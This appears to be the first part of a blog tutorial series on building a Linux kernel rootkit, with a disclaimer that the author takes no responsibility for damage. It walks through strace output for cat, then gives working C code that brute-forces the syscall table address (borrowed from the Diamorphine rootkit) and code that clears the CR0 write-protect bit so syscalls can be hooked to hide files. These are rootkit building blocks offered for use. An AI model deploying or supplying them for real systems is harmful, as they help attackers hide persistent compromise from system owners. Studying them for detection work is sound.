Every technique used in this rootkit can be found from internet, I am NOT responsible for any damage you might cause using my code
what you will learn
- what system calls are
- how to hijack them
how to hook syscalls
what?
to make the magic work, you have to deceive user space programs, meaning controlling the interface between user space and kernel, ie. syscalls
take cat
for example, how does it open the target file for reading?
$ strace cat /tmp/test
execve("/usr/bin/cat", ["cat", "/tmp/test"], 0x7ffc0ef32218 /* 29 vars */) = 0
brk(NULL) = 0x5564de58a000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=41793, ...}) = 0
mmap(NULL, 41793, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ceaf000
close(3) = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260A\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1824496, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15cead000
mmap(NULL, 1837056, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe15ccec000
mprotect(0x7fe15cd0e000, 1658880, PROT_NONE) = 0
mmap(0x7fe15cd0e000, 1343488, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x22000) = 0x7fe15cd0e000
mmap(0x7fe15ce56000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x16a000) = 0x7fe15ce56000
mmap(0x7fe15cea3000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b6000) = 0x7fe15cea3000
mmap(0x7fe15cea9000, 14336, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe15cea9000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7fe15ceae540) = 0
mprotect(0x7fe15cea3000, 16384, PROT_READ) = 0
mprotect(0x5564de4d4000, 4096, PROT_READ) = 0
mprotect(0x7fe15cee1000, 4096, PROT_READ) = 0
munmap(0x7fe15ceaf000, 41793) = 0
brk(NULL) = 0x5564de58a000
brk(0x5564de5ab000) = 0x5564de5ab000
openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=3031632, ...}) = 0
mmap(NULL, 3031632, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe15ca07000
close(3) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0), ...}) = 0
openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072) = 5
write(1, "test\n", 5test
) = 5
read(3, "", 131072) = 0
munmap(0x7fe15c9e5000, 139264) = 0
close(3) = 0
close(1) = 0
close(2) = 0
exit_group(0) = ?
+++ exited with 0 +++
the core part:
openat(AT_FDCWD, "/tmp/test", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=5, ...}) = 0
fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0
mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe15c9e5000
read(3, "test\n", 131072) = 5
write(1, "test\n", 5test
) = 5
more specifically, its the openat
syscall that helps cat
get the target file. now we know if we hook openat
,
we can tell cat
that this file doesnt exist, or give it Permission denied
hook?
redirecting a syscall to a custom function, is called hooking.
to do that, first we need to
find syscall table
basically its about replacing syscalls with your own functions, only in practice, you just modify the syscall table which holds addresses to all syscalls
when you have successfully made the target syscall to point to your custom function, all user space programs start to talk to your function instead of the real one
to do that, first we need to get the syscall table
unsigned long*
get_syscall_table_bf(void)
{
unsigned long* syscall_table;
unsigned long int i;
for (i = (unsigned long int)sys_close; i < ULONG_MAX;
i += sizeof(void*)) {
syscall_table = (unsigned long*)i;
if (syscall_table[__NR_close] == (unsigned long)sys_close)
return syscall_table;
}
return NULL;
}
the above code is borrowed from diamorphine
several notes to carry in mind:
- a syscall function is of type
long
, meaning it can return a signed (negative) long int as errno syscall_table[__NR_close]
means syscallclose
ofsyscall_table
array, in which__NR_close
is the syscall number (index) ofclose
- syscall table is an array of
unsigned long
, each element represents an address of the coresponding syscall
now i will explain what happens in the get_syscall_table_bf()
function:
- we define a
syscall_table
to hold the actual syscall table that we get eventually sys_close
represents the currentclose
syscall's address, its the starting point we use to search- loop until
i
reachesULONG_MAX
, ie. the max unsigned int number. in each loop, we use(unsigned long*)i
assyscall_table
(address), see if thissyscall_table
is valid, by checking ifsyscall_table[__NR_close]
equals the actualclose
syscall - return if we found the match
how does the search work?
$ sudo cat /boot/System.map-xxxx-generic | grep -e 'sys_call_table' -e 'sys_close'
ffffffff8125e8e0 T __ia32_sys_close
ffffffff8125ec70 T __x64_sys_close # `sys_close` address
ffffffff81c001e0 R sys_call_table # syscall table address
ffffffff81c015c0 R ia32_sys_call_table
ffffffff825985f0 t _eil_addr___ia32_sys_close
ffffffff82598600 t _eil_addr___x64_sys_close
we see that sys_call_table
's address is greater than sys_close
's, therefore by doing a search from sys_close
to ULONG_MAX
(the highest address possible), we are able to find sys_call_table
why close
then? well, technically anything that resides lower than sys_call_table
will do.
simple put, we just need to find some point to start from, as long as sys_call_table
is in our search interval, we will find it without issue
note, syscall table is obtained at runtime, you will only need to compile the LKM once for the same kernel
when syscall table is located, our next move is
alter syscall table
one does not simply modify the syscall table, because ffffffff81c001e0 R sys_call_table
has an R
which implies its read-only
there are solutions, of course, please read this:
theres a WP (write protect) bit in cr0
control register:
When set, the CPU can't write to read-only pages when privilege level is 0
level 0 is where your LKM code (the kernel) lives, so by setting the cr0
's WP bit to "disabled" mode, we get the permission to ignore read-only
sounds really cool, but how do we do that?
static inline void
protect_memory(void)
{
write_cr0(cr0);
}
static inline void
unprotect_memory(void)
{
write_cr0(cr0 & ~0x00010000);
}
static int mod_init(void) {
unsigned long cr0;
cr0 = read_cr0();
unprotect_memory();
/* hook some syscalls */
protect_memory();
return 0;
}
AND with 0, we always get 0, thus WP bits gets disabled. we can OR it back of course, but since we have already read_cr0()
, setting cr0
back is really easy
okay, i guess i have covered the kernel hooking part, in 0x02, im gonna hook some syscalls, to finish our LKM
Comments
comments powered by Disqus